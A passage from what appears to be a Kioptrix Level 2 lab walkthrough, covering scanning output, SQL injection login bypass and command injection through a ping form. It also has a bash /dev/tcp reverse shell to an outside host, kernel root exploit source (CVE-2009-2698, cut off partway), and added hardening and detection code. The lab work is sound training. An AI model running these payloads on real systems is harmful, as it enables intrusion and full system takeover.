    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/misc/ ----
+ http://192.168.1.10/manual/de/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/mod/ ----
+ http://192.168.1.10/manual/de/mod/index.html (CODE:200|SIZE:13561)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/programs/ ----
+ http://192.168.1.10/manual/de/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/ssl/ ----
+ http://192.168.1.10/manual/de/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/developer/ ----
+ http://192.168.1.10/manual/en/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/faq/ ----
+ http://192.168.1.10/manual/en/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/howto/ ----
+ http://192.168.1.10/manual/en/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/misc/ ----
+ http://192.168.1.10/manual/en/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/mod/ ----
+ http://192.168.1.10/manual/en/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/programs/ ----
+ http://192.168.1.10/manual/en/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/ssl/ ----
+ http://192.168.1.10/manual/en/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/developer/ ----
+ http://192.168.1.10/manual/fr/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/faq/ ----
+ http://192.168.1.10/manual/fr/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/howto/ ----
+ http://192.168.1.10/manual/fr/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/misc/ ----
+ http://192.168.1.10/manual/fr/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/mod/ ----
+ http://192.168.1.10/manual/fr/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/programs/ ----
+ http://192.168.1.10/manual/fr/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/ssl/ ----
+ http://192.168.1.10/manual/fr/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/developer/ ----
+ http://192.168.1.10/manual/ja/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/faq/ ----
+ http://192.168.1.10/manual/ja/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/howto/ ----
+ http://192.168.1.10/manual/ja/howto/index.html (CODE:200|SIZE:5607)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/misc/ ----
+ http://192.168.1.10/manual/ja/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/mod/ ----
+ http://192.168.1.10/manual/ja/mod/index.html (CODE:200|SIZE:13298)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/programs/ ----
+ http://192.168.1.10/manual/ja/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/ssl/ ----
+ http://192.168.1.10/manual/ja/ssl/index.html (CODE:200|SIZE:3957)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/developer/ ----
+ http://192.168.1.10/manual/ko/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/faq/ ----
+ http://192.168.1.10/manual/ko/faq/index.html (CODE:200|SIZE:3371)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/howto/ ----
+ http://192.168.1.10/manual/ko/howto/index.html (CODE:200|SIZE:5299)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/misc/ ----
+ http://192.168.1.10/manual/ko/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/mod/ ----
+ http://192.168.1.10/manual/ko/mod/index.html (CODE:200|SIZE:12795)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/programs/ ----
+ http://192.168.1.10/manual/ko/programs/index.html (CODE:200|SIZE:4543)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/ssl/ ----
+ http://192.168.1.10/manual/ko/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/developer/ ----
+ http://192.168.1.10/manual/ru/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/faq/ ----
+ http://192.168.1.10/manual/ru/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/howto/ ----
+ http://192.168.1.10/manual/ru/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/misc/ ----
+ http://192.168.1.10/manual/ru/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/mod/ ----
+ http://192.168.1.10/manual/ru/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/programs/ ----
+ http://192.168.1.10/manual/ru/programs/index.html (CODE:200|SIZE:5016)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/ssl/ ----
+ http://192.168.1.10/manual/ru/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Jun  9 10:25:00 2024
DOWNLOADED: 262884 - FOUND: 102

2.4.2 dirsearch directory scan

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.10 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.1.10/_24-06-09_10-13-18.txt

Target: https://192.168.1.10/

[10:13:18] Starting: 
[10:13:33] 403 -  292B  - /.ht_wsr.txt                                      
[10:13:34] 403 -  295B  - /.htaccess.bak1                                   
[10:13:34] 403 -  295B  - /.htaccess.orig                                   
[10:13:34] 403 -  293B  - /.htaccessBAK
[10:13:34] 403 -  293B  - /.htaccessOLD
[10:13:34] 403 -  295B  - /.htaccess.save                                   
[10:13:34] 403 -  296B  - /.htaccess_extra                                  
[10:13:34] 403 -  295B  - /.htaccess_orig
[10:13:34] 403 -  293B  - /.htaccess_sc
[10:13:34] 403 -  297B  - /.htaccess.sample
[10:13:34] 403 -  285B  - /.htm                                             
[10:13:34] 403 -  295B  - /.htpasswd_test                                   
[10:13:34] 403 -  291B  - /.htpasswds
[10:13:34] 403 -  294B  - /.htaccessOLD2                                    
[10:13:34] 403 -  286B  - /.html                                            
[10:13:35] 403 -  292B  - /.httr-oauth                                      
[10:14:57] 403 -  289B  - /cgi-bin/                                         
[10:15:25] 403 -  287B  - /error/                                           
[10:16:06] 301 -  315B  - /manual  ->  https://192.168.1.10/manual/         
[10:16:07] 200 -    7KB - /manual/index.html                                
[10:17:22] 403 -  286B  - /usage                                            
                                                                             
Task Completed

The scans return a number of directories (102 found), almost all of them under http://192.168.1.10/manual/.

2.5 Vulnerability entry points

2.5.1 Visiting the login page

Visit:
http://192.168.1.10
Login page

2.5.2 Visiting the manual page

Test URL:
http://192.168.1.10/manual/
manual

2.5.3 nikto

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.10
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.10
+ Target Hostname:    192.168.1.10
+ Target Port:        80
+ Start Time:         2024-06-09 10:31:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ /: Retrieved x-powered-by header: PHP/4.3.9.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /manual/: Uncommon header 'tcn' found, with contents: choice.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-06-09 10:32:23 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2.5.4 SQL injection

2.5.4.1 sqlmap
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u http://192.168.1.10/index.php --forms --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:41:36 /2024-06-09/

[10:41:36] [INFO] testing connection to the target URL
[10:41:36] [INFO] searching for forms
[1/1] Form:
POST http://192.168.1.10/index.php
POST data: uname=&psw=&btnLogin=Login
do you want to test this form? [Y/n/q] 
> Y


do you want to fill blank fields with random values? [Y/n] Y
[10:41:51] [INFO] using '/root/.local/share/sqlmap/output/results-06092024_1041am.csv' as the CSV results file in multiple targets mode
[10:41:51] [INFO] testing if the target URL content is stable
[10:41:52] [INFO] target URL content is stable
[10:41:52] [INFO] testing if POST parameter 'uname' is dynamic
[10:41:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[10:41:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[10:41:52] [INFO] testing for SQL injection on POST parameter 'uname'
[10:41:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:52] [INFO] testing 'Generic inline queries'
[10:41:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:52] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:41:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:55] [WARNING] POST parameter 'uname' does not seem to be injectable
[10:41:55] [INFO] testing if POST parameter 'psw' is dynamic
[10:41:55] [WARNING] POST parameter 'psw' does not appear to be dynamic
[10:41:55] [WARNING] heuristic (basic) test shows that POST parameter 'psw' might not be injectable
[10:41:55] [INFO] testing for SQL injection on POST parameter 'psw'
[10:41:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:55] [INFO] testing 'Generic inline queries'
[10:41:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:55] [INFO] testing 'Oracle AND time-based blind'
[10:41:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:55] [WARNING] POST parameter 'psw' does not seem to be injectable
[10:41:55] [INFO] testing if POST parameter 'btnLogin' is dynamic
[10:41:55] [WARNING] POST parameter 'btnLogin' does not appear to be dynamic
[10:41:55] [WARNING] heuristic (basic) test shows that POST parameter 'btnLogin' might not be injectable
[10:41:55] [INFO] testing for SQL injection on POST parameter 'btnLogin'
[10:41:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:56] [INFO] testing 'Generic inline queries'
[10:41:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:56] [INFO] testing 'Oracle AND time-based blind'
[10:41:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:56] [WARNING] POST parameter 'btnLogin' does not seem to be injectable
[10:41:56] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next target
[10:41:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-06092024_1041am.csv'

[*] ending @ 10:41:56 /2024-06-09/

No result.

2.5.4.2 Manual SQL injection

admin
Login succeeded


3. Penetration testing

3.1 Trying command injection

3.1.1 id

127.0.0.1;id

id

Output is returned, so remote commands can be executed through the form.

3.1.2 passwd

127.0.0.1;cat /etc/passwd

passwd

System files can be read.
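Where the injection above comes from and how to close it, as an added example that is not part of the original walkthrough (the Kioptrix form itself is PHP; this is a Python illustration with hypothetical function names):

```python
import ipaddress
import subprocess

# Added example, not code from the Kioptrix VM. The page's web form takes a
# host to ping; submitting "127.0.0.1;id" shows the raw value reaches a shell.
# The vulnerable and the hardened form are shown side by side.


def vulnerable_ping_command(target: str) -> str:
    """How the broken form behaves: user input concatenated into a shell
    command line, so ';' ends the ping and starts a second command."""
    return "ping -c 3 " + target


def shell_would_split(cmdline: str) -> list:
    """Approximation of what /bin/sh does with the vulnerable command line:
    ';' separates commands. Used only to illustrate the injection."""
    return [part.strip() for part in cmdline.split(";") if part.strip()]


def is_ip_literal(value: str) -> bool:
    """Allow-list check: accept only a syntactically valid IPv4/IPv6 literal.
    Anything with ';', '|', '`', spaces or a hostname is rejected."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def safe_ping_argv(target: str) -> list:
    """Hardened form: validate first, then build an argv list.
    The list form never goes through a shell, so even a ';' that slipped
    past validation would be an ordinary character inside one argument."""
    if not is_ip_literal(target):
        raise ValueError("target must be a literal IP address")
    return ["ping", "-c", "3", target.strip()]


def run_ping(target: str) -> int:
    """Run the validated command without shell=True; returns the exit status.
    Needs a ping binary on the host, so it is not exercised offline."""
    result = subprocess.run(safe_ping_argv(target), capture_output=True, timeout=30)
    return result.returncode


if __name__ == "__main__":
    # The page's payload: one form value, two commands for the shell.
    print(shell_would_split(vulnerable_ping_command("127.0.0.1;id")))
    # The same value never reaches a shell in the hardened form.
    try:
        safe_ping_argv("127.0.0.1;id")
    except ValueError as err:
        print("rejected:", err)
```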

3.2 Reverse shell

3.2.1 Listening on a port in Kali

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 10086       
listening on [any] 10086 ...

The terminal shows that it is listening on port 10086.

3.2.2 Command injection

Injected command: 127.0.0.1;bash -i>&/dev/tcp/192.168.1.111/10086 0>&1

bash

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 10086       
listening on [any] 10086 ...
192.168.1.10: inverse host lookup failed: Unknown host
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.10] 32832
bash: no job control in this shell
bash-3.00$ 
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Shell obtained.
The Kali listener now has a reverse shell on the target, but only as the apache user rather than root, so the next step is privilege escalation.
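The detection side of the reverse shell above, as an added example that is not part of the original post: a small rule set run over constructed process telemetry (hypothetical records, not captured from the VM) that flags the /dev/tcp redirection and an interactive shell descending from httpd.

```python
import re

# Constructed process events (not from the page): what a host agent on the
# target would record when the injected "bash -i >& /dev/tcp/..." runs.
# uid 48 is the apache user the shell on the page ran as.
EVENTS = [
    {"pid": 2001, "ppid": 1, "uid": 0, "comm": "httpd", "cmdline": "/usr/sbin/httpd"},
    {"pid": 2010, "ppid": 2001, "uid": 48, "comm": "httpd", "cmdline": "/usr/sbin/httpd"},
    {"pid": 2011, "ppid": 2010, "uid": 48, "comm": "sh",
     "cmdline": "sh -c ping -c 3 127.0.0.1;bash -i>&/dev/tcp/192.168.1.111/10086 0>&1"},
    {"pid": 2012, "ppid": 2011, "uid": 48, "comm": "ping", "cmdline": "ping -c 3 127.0.0.1"},
    {"pid": 2013, "ppid": 2011, "uid": 48, "comm": "bash", "cmdline": "bash -i"},
    {"pid": 2014, "ppid": 2013, "uid": 48, "comm": "id", "cmdline": "id"},
    # A normal interactive login shell of a local user: must not be flagged.
    {"pid": 3000, "ppid": 1, "uid": 500, "comm": "bash", "cmdline": "bash -i"},
]

SHELLS = {"sh", "bash", "dash"}
# bash's built-in network redirection: /dev/tcp/<ip>/<port> or /dev/udp/...
DEV_TCP = re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")


def ancestors(by_pid, pid):
    """Walk ppid links upward and return the chain of parent records."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ppid = by_pid[pid]["ppid"]
        if ppid not in by_pid:
            break
        chain.append(by_pid[ppid])
        pid = ppid
    return chain


def detect_reverse_shell(events):
    """Return (pid, rule, detail) tuples for processes matching either rule:
    1. command line carries a /dev/tcp or /dev/udp redirection target;
    2. an interactive shell (-i) whose ancestry includes the web server."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        match = DEV_TCP.search(e["cmdline"])
        if match:
            alerts.append((e["pid"], "devtcp-redirect", match.group(0)))
            continue
        argv = e["cmdline"].split()
        web_child = any(a["comm"] == "httpd" for a in ancestors(by_pid, e["pid"]))
        if e["comm"] in SHELLS and "-i" in argv and web_child:
            alerts.append((e["pid"], "httpd-spawned-interactive-shell", e["cmdline"]))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect_reverse_shell(EVENTS):
        print(f"pid {pid}: {rule} ({detail})")
```

The first rule catches the payload string itself; the second still fires when the payload is obfuscated, because it keys on the process tree (a web server should never have an interactive shell beneath it).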

3.3 Privilege escalation

3.3.1 System information

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Linux 2.6.9

3.3.2 Distribution release

bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)

CentOS release 4.5 (Final)

3.3.3 Exploit search

┌──(root㉿kali)-[/home/kali]
└─# searchsploit centos 4.5
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                   |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)                                                            | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                                                             | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation                                                                                                                    | linux/local/35370.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Matching exploit:
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | linux_x86/local/9542.c

3.3.4 Downloading the exploit

Run:

searchsploit -m 9542.c
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# searchsploit -m 9542.c
  Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
      URL: https://www.exploit-db.com/exploits/9542
     Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
    Codes: CVE-2009-2698
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/dev_run_app/vulhub/kl_2/9542.c


                                                                                                                                                                                                                                   
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# ls
9542.c

The exploit source was copied successfully.

3.3.5 Viewing the exploit

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# cat 9542.c
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
